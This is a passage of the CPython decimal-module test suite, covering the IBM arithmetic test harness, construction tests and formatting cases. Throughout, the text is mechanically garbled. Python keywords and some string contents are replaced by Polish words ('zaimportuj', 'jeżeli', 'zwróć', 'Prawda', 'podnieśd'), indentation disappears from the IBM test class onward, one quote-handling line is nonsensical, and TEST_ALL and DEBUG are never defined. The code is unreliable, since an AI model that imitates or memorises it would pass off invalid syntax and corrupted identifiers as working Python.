# All rights reserved.
# Written by Eric Price <eprice at tjhsst.edu>
# oraz Facundo Batista <facundo at taniquetil.com.ar>
# oraz Raymond Hettinger <python at rcn.com>
# oraz Aahz (aahz at pobox.com)
# oraz Tim Peters
"""
These are the test cases dla the Decimal module.
There are two groups of tests, Arithmetic oraz Behaviour. The former test
the Decimal arithmetic using the tests provided by Mike Cowlishaw. The latter
test the pythonic behaviour according to PEP 327.
Cowlishaw's tests can be downloaded from:
http://speleotrove.com/decimal/dectest.zip
This test module can be called z command line przy one parameter (Arithmetic
or Behaviour) to test each part, albo without parameter to test both parts. If
you're working through IDLE, you can zaimportuj this test module oraz call test_main()
przy the corresponding argument.
"""
zaimportuj math
zaimportuj os, sys
zaimportuj operator
zaimportuj warnings
zaimportuj pickle, copy
zaimportuj unittest
zaimportuj numbers
zaimportuj locale
z test.support zaimportuj (run_unittest, run_doctest, is_resource_enabled,
requires_IEEE_754, requires_docstrings)
z test.support zaimportuj (check_warnings, import_fresh_module, TestFailed,
run_with_locale, cpython_only)
zaimportuj random
zaimportuj time
zaimportuj warnings
zaimportuj inspect
# threading is optional; fall back gracefully when it is unavailable.
spróbuj:
    zaimportuj threading
wyjąwszy ImportError:
    threading = Nic

# C accelerator (_decimal) and the pure-Python reference implementation.
C = import_fresh_module('decimal', fresh=['_decimal'])
P = import_fresh_module('decimal', blocked=['_decimal'])
orig_sys_decimal = sys.modules['decimal']

# The fractions module must import the correct decimal module.
cfractions = import_fresh_module('fractions', fresh=['fractions'])
sys.modules['decimal'] = P
pfractions = import_fresh_module('fractions', fresh=['fractions'])
sys.modules['decimal'] = C
fractions = {C:cfractions, P:pfractions}
sys.modules['decimal'] = orig_sys_decimal

# Useful test constant: all context flag names, per implementation.
Signals = {
    C: tuple(C.getcontext().flags.keys()) jeżeli C inaczej Nic,
    P: tuple(P.getcontext().flags.keys())
}
# Signals ordered with respect to precedence: when an operation
# produces multiple signals, signals occurring later in the list
# should be handled before those occurring earlier in the list.
OrderedSignals = {
    C: [C.Clamped, C.Rounded, C.Inexact, C.Subnormal, C.Underflow,
        C.Overflow, C.DivisionByZero, C.InvalidOperation,
        C.FloatOperation] jeżeli C inaczej Nic,
    P: [P.Clamped, P.Rounded, P.Inexact, P.Subnormal, P.Underflow,
        P.Overflow, P.DivisionByZero, P.InvalidOperation,
        P.FloatOperation]
}
def assert_signals(cls, context, attr, expected):
    # Assert that exactly the signals in `expected` are set in context.<attr>.
    d = getattr(context, attr)
    cls.assertPrawda(all(d[s] jeżeli s w expected inaczej nie d[s] dla s w d))
# Rounding-mode aliases taken from the pure-Python implementation.
ROUND_UP = P.ROUND_UP
ROUND_DOWN = P.ROUND_DOWN
ROUND_CEILING = P.ROUND_CEILING
ROUND_FLOOR = P.ROUND_FLOOR
ROUND_HALF_UP = P.ROUND_HALF_UP
ROUND_HALF_DOWN = P.ROUND_HALF_DOWN
ROUND_HALF_EVEN = P.ROUND_HALF_EVEN
ROUND_05UP = P.ROUND_05UP

RoundingModes = [
    ROUND_UP, ROUND_DOWN, ROUND_CEILING, ROUND_FLOOR,
    ROUND_HALF_UP, ROUND_HALF_DOWN, ROUND_HALF_EVEN,
    ROUND_05UP
]

# Tests are built around these assumed context defaults.
# test_main() restores the original context.
ORIGINAL_CONTEXT = {
    C: C.getcontext().copy() jeżeli C inaczej Nic,
    P: P.getcontext().copy()
}
def init(m):
    # Install a deterministic default context on module m; skip when m is None.
    jeżeli nie m: zwróć
    DefaultTestContext = m.Context(
        prec=9, rounding=ROUND_HALF_EVEN, traps=dict.fromkeys(Signals[m], 0)
    )
    m.setcontext(DefaultTestContext)
TESTDATADIR = 'decimaltestdata'
# Resolve the test-data directory relative to this file (or argv[0] when run
# as a script).
jeżeli __name__ == '__main__':
    file = sys.argv[0]
inaczej:
    file = __file__
testdir = os.path.dirname(file) albo os.curdir
directory = testdir + os.sep + TESTDATADIR + os.sep

skip_expected = nie os.path.isdir(directory)

# Make sure it actually raises errors when not expected and caught in flags.
# Slower, since it runs some things several times.
EXTENDEDERRORTEST = Nieprawda

# Test extra functionality in the C version (-DEXTRA_FUNCTIONALITY).
EXTRA_FUNCTIONALITY = Prawda jeżeli hasattr(C, 'DecClamped') inaczej Nieprawda
requires_extra_functionality = unittest.skipUnless(
    EXTRA_FUNCTIONALITY, "test requires build przy -DEXTRA_FUNCTIONALITY")
skip_if_extra_functionality = unittest.skipIf(
    EXTRA_FUNCTIONALITY, "test requires regular build")
klasa IBMTestCases(unittest.TestCase):
"""Class which tests the Decimal class against the IBM test cases.

Subclasses set `self.decimal` to either the C or the pure-Python module;
each .decTest file is parsed line by line and every equation is executed
against the current context, checking both the result and the flags.
"""
def setUp(self):
# Working context for running the equations; readcontext is a separate,
# deliberately over-sized context used only for parsing operands.
self.context = self.decimal.Context()
self.readcontext = self.decimal.Context()
# Substrings that mark a test line as not applicable to this harness.
self.ignore_list = ['#']
# List of individual .decTest test ids that correspond to tests that
# we're skipping for one reason or another.
self.skipped_test_ids = set([
# Skip implementation-specific scaleb tests.
'scbx164',
'scbx165',
# For some operations (currently exp, ln, log10, power), the decNumber
# reference implementation imposes additional restrictions on the context
# and operands. These restrictions are not part of the specification;
# however, the effect of these restrictions does show up in some of the
# testcases. We skip testcases that violate these restrictions, since
# Decimal behaves differently from decNumber for these testcases so these
# testcases would otherwise fail.
'expx901',
'expx902',
'expx903',
'expx905',
'lnx901',
'lnx902',
'lnx903',
'lnx905',
'logx901',
'logx902',
'logx903',
'logx905',
'powx1183',
'powx1184',
'powx4001',
'powx4002',
'powx4003',
'powx4005',
'powx4008',
'powx4010',
'powx4012',
'powx4014',
])
jeżeli self.decimal == C:
# status has additional Subnormal, Underflow
self.skipped_test_ids.add('pwsx803')
self.skipped_test_ids.add('pwsx805')
# Correct rounding (skipped for decNumber, too)
self.skipped_test_ids.add('powx4302')
self.skipped_test_ids.add('powx4303')
self.skipped_test_ids.add('powx4342')
self.skipped_test_ids.add('powx4343')
# http://bugs.python.org/issue7049
self.skipped_test_ids.add('pwmx325')
self.skipped_test_ids.add('pwmx326')
# Map test directives to setter functions.
self.ChangeDict = {'precision' : self.change_precision,
'rounding' : self.change_rounding_method,
'maxexponent' : self.change_max_exponent,
'minexponent' : self.change_min_exponent,
'clamp' : self.change_clamp}
# Name adapter to be able to change the Decimal and Context
# interface without changing the test files from Cowlishaw.
self.NameAdapter = {'and':'logical_and',
'apply':'_apply',
'class':'number_class',
'comparesig':'compare_signal',
'comparetotal':'compare_total',
'comparetotmag':'compare_total_mag',
'copy':'copy_decimal',
'copyabs':'copy_abs',
'copynegate':'copy_negate',
'copysign':'copy_sign',
'divideint':'divide_int',
'invert':'logical_invert',
'iscanonical':'is_canonical',
'isfinite':'is_finite',
'isinfinite':'is_infinite',
'isnan':'is_nan',
'isnormal':'is_normal',
'isqnan':'is_qnan',
'issigned':'is_signed',
'issnan':'is_snan',
'issubnormal':'is_subnormal',
'iszero':'is_zero',
'maxmag':'max_mag',
'minmag':'min_mag',
'nextminus':'next_minus',
'nextplus':'next_plus',
'nexttoward':'next_toward',
'or':'logical_or',
'reduce':'normalize',
'remaindernear':'remainder_near',
'samequantum':'same_quantum',
'squareroot':'sqrt',
'toeng':'to_eng_string',
'tointegral':'to_integral_value',
'tointegralx':'to_integral_exact',
'tosci':'to_sci_string',
'xor':'logical_xor'}
# Map test-case names to roundings.
self.RoundingDict = {'ceiling' : ROUND_CEILING,
'down' : ROUND_DOWN,
'floor' : ROUND_FLOOR,
'half_down' : ROUND_HALF_DOWN,
'half_even' : ROUND_HALF_EVEN,
'half_up' : ROUND_HALF_UP,
'up' : ROUND_UP,
'05up' : ROUND_05UP}
# Map the test cases' error names to the actual errors.
self.ErrorNames = {'clamped' : self.decimal.Clamped,
'conversion_syntax' : self.decimal.InvalidOperation,
'division_by_zero' : self.decimal.DivisionByZero,
'division_impossible' : self.decimal.InvalidOperation,
'division_undefined' : self.decimal.InvalidOperation,
'inexact' : self.decimal.Inexact,
'invalid_context' : self.decimal.InvalidOperation,
'invalid_operation' : self.decimal.InvalidOperation,
'overflow' : self.decimal.Overflow,
'rounded' : self.decimal.Rounded,
'subnormal' : self.decimal.Subnormal,
'underflow' : self.decimal.Underflow}
# The following functions return booleans rather than a
# Decimal instance.
self.LogicalFunctions = ('is_canonical',
'is_finite',
'is_infinite',
'is_nan',
'is_normal',
'is_qnan',
'is_signed',
'is_snan',
'is_subnormal',
'is_zero',
'same_quantum')
def read_unlimited(self, v, context):
"""Work around the limitations of the 32-bit _decimal version. The
guaranteed maximum values for prec, Emax etc. are 425000000,
but higher values usually work, except for rare corner cases.
In particular, all of the IBM tests pass with maximum values
of 1070000000."""
jeżeli self.decimal == C oraz self.decimal.MAX_EMAX == 425000000:
self.readcontext._unsafe_setprec(1070000000)
self.readcontext._unsafe_setemax(1070000000)
self.readcontext._unsafe_setemin(-1070000000)
zwróć self.readcontext.create_decimal(v)
inaczej:
zwróć self.decimal.Decimal(v, context)
# Run every line of one .decTest file; an unexpected DecimalException
# escaping eval_line is a harness failure, not a test result.
def eval_file(self, file):
global skip_expected
jeżeli skip_expected:
podnieś unittest.SkipTest
przy open(file) jako f:
dla line w f:
line = line.replace('\r\n', '').replace('\n', '')
#print line
spróbuj:
t = self.eval_line(line)
wyjąwszy self.decimal.DecimalException jako exception:
#Exception raised where there shouldn't have been one.
self.fail('Exception "'+exception.__class__.__name__ + '" podnieśd on line '+line)
# Strip comments from one test-file line and dispatch it: blank -> skip,
# contains ':' -> directive, otherwise -> equation.
def eval_line(self, s):
jeżeli s.find(' -> ') >= 0 oraz s[:2] != '--' oraz nie s.startswith(' --'):
s = (s.split('->')[0] + '->' +
s.split('->')[1].split('--')[0]).strip()
inaczej:
s = s.split('--')[0].strip()
dla ignore w self.ignore_list:
jeżeli s.find(ignore) >= 0:
#print s.split()[0], 'NotImplemented--', ignore
zwróć
jeżeli nie s:
zwróć
albo_inaczej ':' w s:
zwróć self.eval_directive(s)
inaczej:
zwróć self.eval_equation(s)
# Apply a 'name : value' directive (precision, rounding, ...) to the
# working context via ChangeDict; unknown directives are ignored.
def eval_directive(self, s):
funct, value = (x.strip().lower() dla x w s.split(':'))
jeżeli funct == 'rounding':
value = self.RoundingDict[value]
inaczej:
spróbuj:
value = int(value)
wyjąwszy ValueError:
dalej
funct = self.ChangeDict.get(funct, (lambda *args: Nic))
funct(value)
# Parse and execute one 'id op operands -> answer conditions' line,
# checking the result string and the raised/flagged signals.
def eval_equation(self, s):
jeżeli nie TEST_ALL oraz random.random() < 0.90:
zwróć
self.context.clear_flags()
spróbuj:
Sides = s.split('->')
L = Sides[0].strip().split()
id = L[0]
jeżeli DEBUG:
print("Test ", id, end=" ")
funct = L[1].lower()
valstemp = L[2:]
L = Sides[1].strip().split()
ans = L[0]
exceptions = L[1:]
wyjąwszy (TypeError, AttributeError, IndexError):
podnieś self.decimal.InvalidOperation
def FixQuotes(val):
val = val.replace("''", 'SingleQuote').replace('""', 'DoubleQuote')
val = val.replace("'", '').replace('SingleQuote', "'").replace('"', '').replace('DoubleQuote', '"') jeżeli Nieprawda inaczej val
val = val.replace("'", '').replace('"', '')
val = val.replace('SingleQuote', "'").replace('DoubleQuote', '"')
zwróć val
jeżeli id w self.skipped_test_ids:
zwróć
fname = self.NameAdapter.get(funct, funct)
jeżeli fname == 'rescale':
zwróć
funct = getattr(self.context, fname)
vals = []
conglomerate = ''
quote = 0
theirexceptions = [self.ErrorNames[x.lower()] dla x w exceptions]
dla exception w Signals[self.decimal]:
self.context.traps[exception] = 1 #Catch these bugs...
dla exception w theirexceptions:
self.context.traps[exception] = 0
dla i, val w enumerate(valstemp):
jeżeli val.count("'") % 2 == 1:
quote = 1 - quote
jeżeli quote:
conglomerate = conglomerate + ' ' + val
kontynuuj
inaczej:
val = conglomerate + val
conglomerate = ''
v = FixQuotes(val)
jeżeli fname w ('to_sci_string', 'to_eng_string'):
jeżeli EXTENDEDERRORTEST:
dla error w theirexceptions:
self.context.traps[error] = 1
spróbuj:
funct(self.context.create_decimal(v))
wyjąwszy error:
dalej
wyjąwszy Signals[self.decimal] jako e:
self.fail("Raised %s w %s when %s disabled" % \
(e, s, error))
inaczej:
self.fail("Did nie podnieś %s w %s" % (error, s))
self.context.traps[error] = 0
v = self.context.create_decimal(v)
inaczej:
v = self.read_unlimited(v, self.context)
vals.append(v)
ans = FixQuotes(ans)
jeżeli EXTENDEDERRORTEST oraz fname nie w ('to_sci_string', 'to_eng_string'):
dla error w theirexceptions:
self.context.traps[error] = 1
spróbuj:
funct(*vals)
wyjąwszy error:
dalej
wyjąwszy Signals[self.decimal] jako e:
self.fail("Raised %s w %s when %s disabled" % \
(e, s, error))
inaczej:
self.fail("Did nie podnieś %s w %s" % (error, s))
self.context.traps[error] = 0
# As above, but add traps cumulatively, to check precedence
ordered_errors = [e dla e w OrderedSignals[self.decimal] jeżeli e w theirexceptions]
dla error w ordered_errors:
self.context.traps[error] = 1
spróbuj:
funct(*vals)
wyjąwszy error:
dalej
wyjąwszy Signals[self.decimal] jako e:
self.fail("Raised %s w %s; expected %s" %
(type(e), s, error))
inaczej:
self.fail("Did nie podnieś %s w %s" % (error, s))
# reset traps
dla error w ordered_errors:
self.context.traps[error] = 0
jeżeli DEBUG:
print("--", self.context)
spróbuj:
result = str(funct(*vals))
jeżeli fname w self.LogicalFunctions:
result = str(int(eval(result))) # boolean repr -> '1', '0'
wyjąwszy Signals[self.decimal] jako error:
self.fail("Raised %s w %s" % (error, s))
wyjąwszy: #Catch any error long enough to state the test case.
print("ERROR:", s)
podnieś
myexceptions = self.getexceptions()
myexceptions.sort(key=repr)
theirexceptions.sort(key=repr)
self.assertEqual(result, ans,
'Incorrect answer dla ' + s + ' -- got ' + result)
self.assertEqual(myexceptions, theirexceptions,
'Incorrect flags set w ' + s + ' -- got ' + str(myexceptions))
# Return the list of signals currently flagged in the working context.
def getexceptions(self):
zwróć [e dla e w Signals[self.decimal] jeżeli self.context.flags[e]]
# Directive setters; the C build needs the _unsafe_* escape hatches to
# accept values beyond its guaranteed 32-bit limits.
def change_precision(self, prec):
jeżeli self.decimal == C oraz self.decimal.MAX_PREC == 425000000:
self.context._unsafe_setprec(prec)
inaczej:
self.context.prec = prec
def change_rounding_method(self, rounding):
self.context.rounding = rounding
def change_min_exponent(self, exp):
jeżeli self.decimal == C oraz self.decimal.MAX_PREC == 425000000:
self.context._unsafe_setemin(exp)
inaczej:
self.context.Emin = exp
def change_max_exponent(self, exp):
jeżeli self.decimal == C oraz self.decimal.MAX_PREC == 425000000:
self.context._unsafe_setemax(exp)
inaczej:
self.context.Emax = exp
def change_clamp(self, clamp):
self.context.clamp = clamp
# Run the IBM test cases against the C implementation.
klasa CIBMTestCases(IBMTestCases):
decimal = C
# Run the IBM test cases against the pure-Python implementation.
klasa PyIBMTestCases(IBMTestCases):
decimal = P
# The following classes test the behaviour of Decimal according to PEP 327
klasa ExplicitConstructionTest(unittest.TestCase):
'''Unit tests for Explicit Construction cases of Decimal.'''
def test_explicit_empty(self):
Decimal = self.decimal.Decimal
self.assertEqual(Decimal(), Decimal("0"))
def test_explicit_from_Nic(self):
Decimal = self.decimal.Decimal
self.assertRaises(TypeError, Decimal, Nic)
def test_explicit_from_int(self):
Decimal = self.decimal.Decimal
#positive
d = Decimal(45)
self.assertEqual(str(d), '45')
#very large positive
d = Decimal(500000123)
self.assertEqual(str(d), '500000123')
#negative
d = Decimal(-45)
self.assertEqual(str(d), '-45')
#zero
d = Decimal(0)
self.assertEqual(str(d), '0')
# single word longs: exercise values around every power-of-two boundary
dla n w range(0, 32):
dla sign w (-1, 1):
dla x w range(-5, 5):
i = sign * (2**n + x)
d = Decimal(i)
self.assertEqual(str(d), str(i))
def test_explicit_from_string(self):
Decimal = self.decimal.Decimal
InvalidOperation = self.decimal.InvalidOperation
localcontext = self.decimal.localcontext
#empty
self.assertEqual(str(Decimal('')), 'NaN')
#int
self.assertEqual(str(Decimal('45')), '45')
#float
self.assertEqual(str(Decimal('45.34')), '45.34')
#engineering notation
self.assertEqual(str(Decimal('45e2')), '4.5E+3')
#just not a number
self.assertEqual(str(Decimal('ugly')), 'NaN')
#leading and trailing whitespace permitted
self.assertEqual(str(Decimal('1.3E4 \n')), '1.3E+4')
self.assertEqual(str(Decimal(' -7.89')), '-7.89')
self.assertEqual(str(Decimal(" 3.45679 ")), '3.45679')
# unicode whitespace
dla lead w ["", ' ', '\u00a0', '\u205f']:
dla trail w ["", ' ', '\u00a0', '\u205f']:
self.assertEqual(str(Decimal(lead + '9.311E+28' + trail)),
'9.311E+28')
przy localcontext() jako c:
c.traps[InvalidOperation] = Prawda
# Invalid string
self.assertRaises(InvalidOperation, Decimal, "xyz")
# Two arguments max
self.assertRaises(TypeError, Decimal, "1234", "x", "y")
# space within the numeric part
self.assertRaises(InvalidOperation, Decimal, "1\u00a02\u00a03")
self.assertRaises(InvalidOperation, Decimal, "\u00a01\u00a02\u00a0")
# unicode whitespace
self.assertRaises(InvalidOperation, Decimal, "\u00a0")
self.assertRaises(InvalidOperation, Decimal, "\u00a0\u00a0")
# embedded NUL
self.assertRaises(InvalidOperation, Decimal, "12\u00003")
@cpython_only
def test_from_legacy_strings(self):
zaimportuj _testcapi
Decimal = self.decimal.Decimal
context = self.decimal.Context()
s = _testcapi.unicode_legacy_string('9.999999')
self.assertEqual(str(Decimal(s)), '9.999999')
self.assertEqual(str(context.create_decimal(s)), '9.999999')
def test_explicit_from_tuples(self):
Decimal = self.decimal.Decimal
#zero
d = Decimal( (0, (0,), 0) )
self.assertEqual(str(d), '0')
#int
d = Decimal( (1, (4, 5), 0) )
self.assertEqual(str(d), '-45')
#float
d = Decimal( (0, (4, 5, 3, 4), -2) )
self.assertEqual(str(d), '45.34')
#weird
d = Decimal( (1, (4, 3, 4, 9, 1, 3, 5, 3, 4), -25) )
self.assertEqual(str(d), '-4.34913534E-17')
#inf
d = Decimal( (0, (), "F") )
self.assertEqual(str(d), 'Infinity')
#wrong number of items
self.assertRaises(ValueError, Decimal, (1, (4, 3, 4, 9, 1)) )
#bad sign
self.assertRaises(ValueError, Decimal, (8, (4, 3, 4, 9, 1), 2) )
self.assertRaises(ValueError, Decimal, (0., (4, 3, 4, 9, 1), 2) )
self.assertRaises(ValueError, Decimal, (Decimal(1), (4, 3, 4, 9, 1), 2))
#bad exp
self.assertRaises(ValueError, Decimal, (1, (4, 3, 4, 9, 1), 'wrong!') )
self.assertRaises(ValueError, Decimal, (1, (4, 3, 4, 9, 1), 0.) )
self.assertRaises(ValueError, Decimal, (1, (4, 3, 4, 9, 1), '1') )
#bad coefficients
self.assertRaises(ValueError, Decimal, (1, "xyz", 2) )
self.assertRaises(ValueError, Decimal, (1, (4, 3, 4, Nic, 1), 2) )
self.assertRaises(ValueError, Decimal, (1, (4, -3, 4, 9, 1), 2) )
self.assertRaises(ValueError, Decimal, (1, (4, 10, 4, 9, 1), 2) )
self.assertRaises(ValueError, Decimal, (1, (4, 3, 4, 'a', 1), 2) )
def test_explicit_from_list(self):
# Lists (and mixed list/tuple nestings) are accepted like tuples.
Decimal = self.decimal.Decimal
d = Decimal([0, [0], 0])
self.assertEqual(str(d), '0')
d = Decimal([1, [4, 3, 4, 9, 1, 3, 5, 3, 4], -25])
self.assertEqual(str(d), '-4.34913534E-17')
d = Decimal([1, (4, 3, 4, 9, 1, 3, 5, 3, 4), -25])
self.assertEqual(str(d), '-4.34913534E-17')
d = Decimal((1, [4, 3, 4, 9, 1, 3, 5, 3, 4], -25))
self.assertEqual(str(d), '-4.34913534E-17')
def test_explicit_from_bool(self):
Decimal = self.decimal.Decimal
self.assertIs(bool(Decimal(0)), Nieprawda)
self.assertIs(bool(Decimal(1)), Prawda)
self.assertEqual(Decimal(Nieprawda), Decimal(0))
self.assertEqual(Decimal(Prawda), Decimal(1))
def test_explicit_from_Decimal(self):
Decimal = self.decimal.Decimal
#positive
d = Decimal(45)
e = Decimal(d)
self.assertEqual(str(e), '45')
#very large positive
d = Decimal(500000123)
e = Decimal(d)
self.assertEqual(str(e), '500000123')
#negative
d = Decimal(-45)
e = Decimal(d)
self.assertEqual(str(e), '-45')
#zero
d = Decimal(0)
e = Decimal(d)
self.assertEqual(str(e), '0')
@requires_IEEE_754
def test_explicit_from_float(self):
Decimal = self.decimal.Decimal
# Conversion from float is exact, hence the long literal below.
r = Decimal(0.1)
self.assertEqual(type(r), Decimal)
self.assertEqual(str(r),
'0.1000000000000000055511151231257827021181583404541015625')
self.assertPrawda(Decimal(float('nan')).is_qnan())
self.assertPrawda(Decimal(float('inf')).is_infinite())
self.assertPrawda(Decimal(float('-inf')).is_infinite())
self.assertEqual(str(Decimal(float('nan'))),
str(Decimal('NaN')))
self.assertEqual(str(Decimal(float('inf'))),
str(Decimal('Infinity')))
self.assertEqual(str(Decimal(float('-inf'))),
str(Decimal('-Infinity')))
self.assertEqual(str(Decimal(float('-0.0'))),
str(Decimal('-0')))
dla i w range(200):
x = random.expovariate(0.01) * (random.random() * 2.0 - 1.0)
self.assertEqual(x, float(Decimal(x))) # roundtrip
def test_explicit_context_create_decimal(self):
Decimal = self.decimal.Decimal
InvalidOperation = self.decimal.InvalidOperation
Rounded = self.decimal.Rounded
nc = copy.copy(self.decimal.getcontext())
nc.prec = 3
# empty
d = Decimal()
self.assertEqual(str(d), '0')
d = nc.create_decimal()
self.assertEqual(str(d), '0')
# from Nic
self.assertRaises(TypeError, nc.create_decimal, Nic)
# from int
d = nc.create_decimal(456)
self.assertIsInstance(d, Decimal)
self.assertEqual(nc.create_decimal(45678),
nc.create_decimal('457E+2'))
# from string
d = Decimal('456789')
self.assertEqual(str(d), '456789')
d = nc.create_decimal('456789')
self.assertEqual(str(d), '4.57E+5')
# leading and trailing whitespace should result in a NaN;
# spaces are already checked in Cowlishaw's test-suite, so
# here we just check that a trailing newline results in a NaN
self.assertEqual(str(nc.create_decimal('3.14\n')), 'NaN')
# from tuples
d = Decimal( (1, (4, 3, 4, 9, 1, 3, 5, 3, 4), -25) )
self.assertEqual(str(d), '-4.34913534E-17')
d = nc.create_decimal( (1, (4, 3, 4, 9, 1, 3, 5, 3, 4), -25) )
self.assertEqual(str(d), '-4.35E-17')
# from Decimal
prevdec = Decimal(500000123)
d = Decimal(prevdec)
self.assertEqual(str(d), '500000123')
d = nc.create_decimal(prevdec)
self.assertEqual(str(d), '5.00E+8')
# more integers
nc.prec = 28
nc.traps[InvalidOperation] = Prawda
dla v w [-2**63-1, -2**63, -2**31-1, -2**31, 0,
2**31-1, 2**31, 2**63-1, 2**63]:
d = nc.create_decimal(v)
self.assertPrawda(isinstance(d, Decimal))
self.assertEqual(int(d), v)
nc.prec = 3
nc.traps[Rounded] = Prawda
self.assertRaises(Rounded, nc.create_decimal, 1234)
# from string
nc.prec = 28
self.assertEqual(str(nc.create_decimal('0E-017')), '0E-17')
self.assertEqual(str(nc.create_decimal('45')), '45')
self.assertEqual(str(nc.create_decimal('-Inf')), '-Infinity')
self.assertEqual(str(nc.create_decimal('NaN123')), 'NaN123')
# invalid arguments
self.assertRaises(InvalidOperation, nc.create_decimal, "xyz")
self.assertRaises(ValueError, nc.create_decimal, (1, "xyz", -25))
self.assertRaises(TypeError, nc.create_decimal, "1234", "5678")
# too many NaN payload digits
nc.prec = 3
self.assertRaises(InvalidOperation, nc.create_decimal, 'NaN12345')
self.assertRaises(InvalidOperation, nc.create_decimal,
Decimal('NaN12345'))
nc.traps[InvalidOperation] = Nieprawda
self.assertEqual(str(nc.create_decimal('NaN12345')), 'NaN')
self.assertPrawda(nc.flags[InvalidOperation])
nc.flags[InvalidOperation] = Nieprawda
self.assertEqual(str(nc.create_decimal(Decimal('NaN12345'))), 'NaN')
self.assertPrawda(nc.flags[InvalidOperation])
def test_explicit_context_create_from_float(self):
# Unlike Decimal(float), create_decimal rounds to the context precision.
Decimal = self.decimal.Decimal
nc = self.decimal.Context()
r = nc.create_decimal(0.1)
self.assertEqual(type(r), Decimal)
self.assertEqual(str(r), '0.1000000000000000055511151231')
self.assertPrawda(nc.create_decimal(float('nan')).is_qnan())
self.assertPrawda(nc.create_decimal(float('inf')).is_infinite())
self.assertPrawda(nc.create_decimal(float('-inf')).is_infinite())
self.assertEqual(str(nc.create_decimal(float('nan'))),
str(nc.create_decimal('NaN')))
self.assertEqual(str(nc.create_decimal(float('inf'))),
str(nc.create_decimal('Infinity')))
self.assertEqual(str(nc.create_decimal(float('-inf'))),
str(nc.create_decimal('-Infinity')))
self.assertEqual(str(nc.create_decimal(float('-0.0'))),
str(nc.create_decimal('-0')))
nc.prec = 100
dla i w range(200):
x = random.expovariate(0.01) * (random.random() * 2.0 - 1.0)
self.assertEqual(x, float(nc.create_decimal(x))) # roundtrip
def test_unicode_digits(self):
# Non-ASCII decimal digits are accepted in the string constructor.
Decimal = self.decimal.Decimal
test_values = {
'\uff11': '1',
'\u0660.\u0660\u0663\u0667\u0662e-\u0663' : '0.0000372',
'-nan\u0c68\u0c6a\u0c66\u0c66' : '-NaN2400',
}
dla input, expected w test_values.items():
self.assertEqual(str(Decimal(input)), expected)
# Explicit-construction tests against the C implementation.
klasa CExplicitConstructionTest(ExplicitConstructionTest):
decimal = C
# Explicit-construction tests against the pure-Python implementation.
klasa PyExplicitConstructionTest(ExplicitConstructionTest):
decimal = P
klasa ImplicitConstructionTest(unittest.TestCase):
'''Unit tests for Implicit Construction cases of Decimal.'''
def test_implicit_from_Nic(self):
Decimal = self.decimal.Decimal
self.assertRaises(TypeError, eval, 'Decimal(5) + Nic', locals())
def test_implicit_from_int(self):
Decimal = self.decimal.Decimal
#normal
self.assertEqual(str(Decimal(5) + 45), '50')
#exceeding precision
self.assertEqual(Decimal(5) + 123456789000, Decimal(123456789000))
def test_implicit_from_string(self):
Decimal = self.decimal.Decimal
self.assertRaises(TypeError, eval, 'Decimal(5) + "3"', locals())
def test_implicit_from_float(self):
Decimal = self.decimal.Decimal
self.assertRaises(TypeError, eval, 'Decimal(5) + 2.2', locals())
def test_implicit_from_Decimal(self):
Decimal = self.decimal.Decimal
self.assertEqual(Decimal(5) + Decimal(45), Decimal(50))
def test_rop(self):
# Verify that Decimal defers to the reflected operator methods of an
# arbitrary other class, so third parties can interoperate.
Decimal = self.decimal.Decimal
# Allow other classes to be trained to interact with Decimals
klasa E:
def __divmod__(self, other):
zwróć 'divmod ' + str(other)
def __rdivmod__(self, other):
zwróć str(other) + ' rdivmod'
def __lt__(self, other):
zwróć 'lt ' + str(other)
def __gt__(self, other):
zwróć 'gt ' + str(other)
def __le__(self, other):
zwróć 'le ' + str(other)
def __ge__(self, other):
zwróć 'ge ' + str(other)
def __eq__(self, other):
zwróć 'eq ' + str(other)
def __ne__(self, other):
zwróć 'ne ' + str(other)
self.assertEqual(divmod(E(), Decimal(10)), 'divmod 10')
self.assertEqual(divmod(Decimal(10), E()), '10 rdivmod')
self.assertEqual(eval('Decimal(10) < E()'), 'gt 10')
self.assertEqual(eval('Decimal(10) > E()'), 'lt 10')
self.assertEqual(eval('Decimal(10) <= E()'), 'ge 10')
self.assertEqual(eval('Decimal(10) >= E()'), 'le 10')
self.assertEqual(eval('Decimal(10) == E()'), 'eq 10')
self.assertEqual(eval('Decimal(10) != E()'), 'ne 10')
# insert operator methods and then exercise them
oplist = [
('+', '__add__', '__radd__'),
('-', '__sub__', '__rsub__'),
('*', '__mul__', '__rmul__'),
('/', '__truediv__', '__rtruediv__'),
('%', '__mod__', '__rmod__'),
('//', '__floordiv__', '__rfloordiv__'),
('**', '__pow__', '__rpow__')
]
dla sym, lop, rop w oplist:
setattr(E, lop, lambda self, other: 'str' + lop + str(other))
setattr(E, rop, lambda self, other: str(other) + rop + 'str')
self.assertEqual(eval('E()' + sym + 'Decimal(10)'),
'str' + lop + '10')
self.assertEqual(eval('Decimal(10)' + sym + 'E()'),
'10' + rop + 'str')
# Implicit-construction tests against the C implementation.
klasa CImplicitConstructionTest(ImplicitConstructionTest):
decimal = C
# Implicit-construction tests against the pure-Python implementation.
klasa PyImplicitConstructionTest(ImplicitConstructionTest):
decimal = P
klasa FormatTest(unittest.TestCase):
'''Unit tests for the format function.'''
def test_formatting(self):
Decimal = self.decimal.Decimal
# triples giving a format, a Decimal, and the expected result
test_values = [
('e', '0E-15', '0e-15'),
('e', '2.3E-15', '2.3e-15'),
('e', '2.30E+2', '2.30e+2'), # preserve significant zeros
('e', '2.30000E-15', '2.30000e-15'),
('e', '1.23456789123456789e40', '1.23456789123456789e+40'),
('e', '1.5', '1.5e+0'),
('e', '0.15', '1.5e-1'),
('e', '0.015', '1.5e-2'),
('e', '0.0000000000015', '1.5e-12'),
('e', '15.0', '1.50e+1'),
('e', '-15', '-1.5e+1'),
('e', '0', '0e+0'),
('e', '0E1', '0e+1'),
('e', '0.0', '0e-1'),
('e', '0.00', '0e-2'),
('.6e', '0E-15', '0.000000e-9'),
('.6e', '0', '0.000000e+6'),
('.6e', '9.999999', '9.999999e+0'),
('.6e', '9.9999999', '1.000000e+1'),
('.6e', '-1.23e5', '-1.230000e+5'),
('.6e', '1.23456789e-3', '1.234568e-3'),
('f', '0', '0'),
('f', '0.0', '0.0'),
('f', '0E-2', '0.00'),
('f', '0.00E-8', '0.0000000000'),
('f', '0E1', '0'), # loses exponent information
('f', '3.2E1', '32'),
('f', '3.2E2', '320'),
('f', '3.20E2', '320'),
('f', '3.200E2', '320.0'),
('f', '3.2E-6', '0.0000032'),
('.6f', '0E-15', '0.000000'), # all zeros treated equally
('.6f', '0E1', '0.000000'),
('.6f', '0', '0.000000'),
('.0f', '0', '0'), # no decimal point
('.0f', '0e-2', '0'),
('.0f', '3.14159265', '3'),
('.1f', '3.14159265', '3.1'),
